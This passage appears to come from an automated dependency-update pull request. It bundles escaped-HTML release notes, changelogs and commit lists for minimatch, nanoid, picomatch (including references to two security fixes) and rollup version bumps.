lockfile\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/b1003749228b2a79e1f237963a0d559ef7a0941e\"\u003e\u003ccode\u003eb100374\u003c/code\u003e\u003c/a\u003e limit recursion for **, improve perf considerably\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/26ffeaa091b9f660833e23f42e07165b33e85c13\"\u003e\u003ccode\u003e26ffeaa\u003c/code\u003e\u003c/a\u003e lockfile update\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/9eca892a4e5dbb20534f9f30483b85cdeee6c2eb\"\u003e\u003ccode\u003e9eca892\u003c/code\u003e\u003c/a\u003e lock node version to 14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/00c323b188b704e5d4bc534ecec2268cfa70a32a\"\u003e\u003ccode\u003e00c323b\u003c/code\u003e\u003c/a\u003e 3.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/30486b2048929264f44d18822891cfffa02af78b\"\u003e\u003ccode\u003e30486b2\u003c/code\u003e\u003c/a\u003e update CI matrix and actions\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/minimatch/compare/v3.1.2...v3.1.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `nanoid` from 3.3.7 to 3.3.11\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ai/nanoid/releases\"\u003enanoid's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.3.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed React Native support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.3.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed React Native support (by \u003ca href=\"https://github.com/steida\"\u003e\u003ccode\u003e@​steida\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.3.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReduced npm package size.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ai/nanoid/blob/main/CHANGELOG.md\"\u003enanoid's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.3.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed React Native support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.3.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed React Native support (by \u003ca href=\"https://github.com/steida\"\u003e\u003ccode\u003e@​steida\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.3.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReduced npm package size.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.3.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a way to break Nano ID by passing non-integer size (by \u003ca href=\"https://github.com/myndzi\"\u003e\u003ccode\u003e@​myndzi\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/37289ceee51a3194a1f121a1e5d2bbb864076b74\"\u003e\u003ccode\u003e37289ce\u003c/code\u003e\u003c/a\u003e Release 3.3.11 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/23690b77719ec8043c2509d28c1d74b0e2295b75\"\u003e\u003ccode\u003e23690b7\u003c/code\u003e\u003c/a\u003e Fix CI\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/c147962de7f5da3311a0e731030a28f49c5266a3\"\u003e\u003ccode\u003ec147962\u003c/code\u003e\u003c/a\u003e Fix RN support\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/a83734e28fa071f51fe3614a5fb891f08a4b91b2\"\u003e\u003ccode\u003ea83734e\u003c/code\u003e\u003c/a\u003e Move to manually ESM/CJS dual package\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/bb12e8a6f9c37ebe0b5ff2c697b8f9dcf34c8948\"\u003e\u003ccode\u003ebb12e8a\u003c/code\u003e\u003c/a\u003e Release 3.3.10 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/8f44264cd724080447f40620974163f1daca4612\"\u003e\u003ccode\u003e8f44264\u003c/code\u003e\u003c/a\u003e Fix Expo support\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/adf9b0c05eeeebbbf391c16bbd93da2fc275e235\"\u003e\u003ccode\u003eadf9b0c\u003c/code\u003e\u003c/a\u003e Release 3.3.9 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/1c6f08825b4f17c4462bd1c19dbc3f1c5626b76f\"\u003e\u003ccode\u003e1c6f088\u003c/code\u003e\u003c/a\u003e Remove dev file from npm package\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/3044cd5e73f4cf31795f61f6e6b961c8c0a5c744\"\u003e\u003ccode\u003e3044cd5\u003c/code\u003e\u003c/a\u003e Release 3.3.8 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/4fe34959c34e5b3573889ed4f24fe91d1d3e7231\"\u003e\u003ccode\u003e4fe3495\u003c/code\u003e\u003c/a\u003e Update size limit\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ai/nanoid/compare/3.3.7...3.3.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e\nand this project adheres to \u003ca href=\"http://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003eChangelogs are for humans, not machines.\u003c/li\u003e\n\u003cli\u003eThere should be an entry for every single version.\u003c/li\u003e\n\u003cli\u003eThe same types of changes should be grouped.\u003c/li\u003e\n\u003cli\u003eVersions and sections should be linkable.\u003c/li\u003e\n\u003cli\u003eThe latest version comes first.\u003c/li\u003e\n\u003cli\u003eThe release date of each versions is displayed.\u003c/li\u003e\n\u003cli\u003eMention whether you follow Semantic Versioning.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eChangelog entries are classified using the following labels \u003cem\u003e(from \u003ca href=\"http://keepachangelog.com/\"\u003ekeep-a-changelog\u003c/a\u003e\u003c/em\u003e):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAdded\u003c/code\u003e for new features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eChanged\u003c/code\u003e for changes in existing functionality.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDeprecated\u003c/code\u003e for soon-to-be removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemoved\u003c/code\u003e for now removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFixed\u003c/code\u003e for any bug fixes.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSecurity\u003c/code\u003e in case of vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e4.0.0 (2024-02-07)\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bad text values in parse \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/126\"\u003e#126\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/connor4312\"\u003e\u003ccode\u003e@​connor4312\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove process global to work outside of node \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/129\"\u003e#129\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/styfle\"\u003e\u003ccode\u003e@​styfle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd sideEffects to package.json \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/128\"\u003e#128\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/frandiox\"\u003e\u003ccode\u003e@​frandiox\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved \u003ccode\u003eos\u003c/code\u003e, make compatible browser environment. See \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/124\"\u003e#124\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/gwsbhqt\"\u003e\u003ccode\u003e@​gwsbhqt\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/81cba8d4b767cab3cb29d26eb4f691eed75b73b2\"\u003e\u003ccode\u003e81cba8d\u003c/code\u003e\u003c/a\u003e Publish 2.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/fc1f6b69006e9435caf8fb40d8aff378bc0b7bce\"\u003e\u003ccode\u003efc1f6b6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/eec17aee5428a7249e9ca5adbb8a0d28fa29619b\"\u003e\u003ccode\u003eeec17ae\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/78f8ca4362d9e66cadea97b93e292f10096452ed\"\u003e\u003ccode\u003e78f8ca4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/156\"\u003e#156\u003c/a\u003e from micromatch/backport-144\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/3f4f10eaa65bf3a52e8f2999674cd27e11fa3c9b\"\u003e\u003ccode\u003e3f4f10e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/144\"\u003e#144\u003c/a\u003e from Jason3S/jdent-object-properties\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `rollup` from 4.21.0 to 4.60.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/rollup/rollup/releases\"\u003erollup's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.60.0\u003c/h2\u003e\n\u003ch2\u003e4.60.0\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-03-22\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport source phase imports as long as they are external (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6279\"\u003e#6279\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6279\"\u003e#6279\u003c/a\u003e: feat: external only Source Phase imports support (\u003ca href=\"https://github.com/guybedford\"\u003e\u003ccode\u003e@​guybedford\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.59.1\u003c/h2\u003e\n\u003ch2\u003e4.59.1\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-03-21\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix a crash when using lazy dynamic imports with moduleSideEffects:false (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6306\"\u003e#6306\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6281\"\u003e#6281\u003c/a\u003e: fix(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6282\"\u003e#6282\u003c/a\u003e: chore(deps): update github artifact actions (major) (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6283\"\u003e#6283\u003c/a\u003e: chore(deps): update dependency nyc to v18 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6284\"\u003e#6284\u003c/a\u003e: fix(deps): update swc monorepo (major) (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6285\"\u003e#6285\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6290\"\u003e#6290\u003c/a\u003e: chore(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6291\"\u003e#6291\u003c/a\u003e: chore(deps): update dependency \u003ccode\u003e@​shikijs/vitepress-twoslash\u003c/code\u003e to v4 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6292\"\u003e#6292\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6297\"\u003e#6297\u003c/a\u003e: chore(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6298\"\u003e#6298\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6299\"\u003e#6299\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6300\"\u003e#6300\u003c/a\u003e: docs: update packagephobia link (\u003ca href=\"https://github.com/bluwy\"\u003e\u003ccode\u003e@​bluwy\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6301\"\u003e#6301\u003c/a\u003e: chore(deps): update dependency lint-staged to ^16.3.3 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6306\"\u003e#6306\u003c/a\u003e: fix: fix chunk assignment for deoptimized module with dynamic import (\u003ca href=\"https://github.com/JoaoBrlt\"\u003e\u003ccode\u003e@​JoaoBrlt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6307\"\u003e#6307\u003c/a\u003e: chore(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6308\"\u003e#6308\u003c/a\u003e: chore(deps): update dependency lru-cache to v11 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6309\"\u003e#6309\u003c/a\u003e: chore(deps): update dependency vite to v8 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6310\"\u003e#6310\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6311\"\u003e#6311\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6312\"\u003e#6312\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.59.0\u003c/h2\u003e\n\u003ch2\u003e4.59.0\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-02-22\u003c/em\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/rollup/rollup/blob/master/CHANGELOG.md\"\u003erollup's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.60.0\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-03-22\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport source phase imports as long as they are external (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6279\"\u003e#6279\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6279\"\u003e#6279\u003c/a\u003e: feat: external only Source Phase imports support (\u003ca href=\"https://github.com/guybedford\"\u003e\u003ccode\u003e@​guybedford\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.59.1\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-03-21\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix a crash when using lazy dynamic imports with moduleSideEffects:false (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6306\"\u003e#6306\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6281\"\u003e#6281\u003c/a\u003e: fix(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6282\"\u003e#6282\u003c/a\u003e: chore(deps): update github artifact actions (major) (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6283\"\u003e#6283\u003c/a\u003e: chore(deps): update dependency nyc to v18 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6284\"\u003e#6284\u003c/a\u003e: fix(deps): update swc monorepo (major) (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6285\"\u003e#6285\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6290\"\u003e#6290\u003c/a\u003e: chore(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6291\"\u003e#6291\u003c/a\u003e: chore(deps): update dependency \u003ccode\u003e@​shikijs/vitepress-twoslash\u003c/code\u003e to v4 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6292\"\u003e#6292\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6297\"\u003e#6297\u003c/a\u003e: chore(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6298\"\u003e#6298\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6299\"\u003e#6299\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6300\"\u003e#6300\u003c/a\u003e: docs: update packagephobia link (\u003ca href=\"https://github.com/bluwy\"\u003e\u003ccode\u003e@​bluwy\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6301\"\u003e#6301\u003c/a\u003e: chore(deps): update dependency lint-staged to ^16.3.3 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6306\"\u003e#6306\u003c/a\u003e: fix: fix chunk assignment for deoptimized module with dynamic import (\u003ca 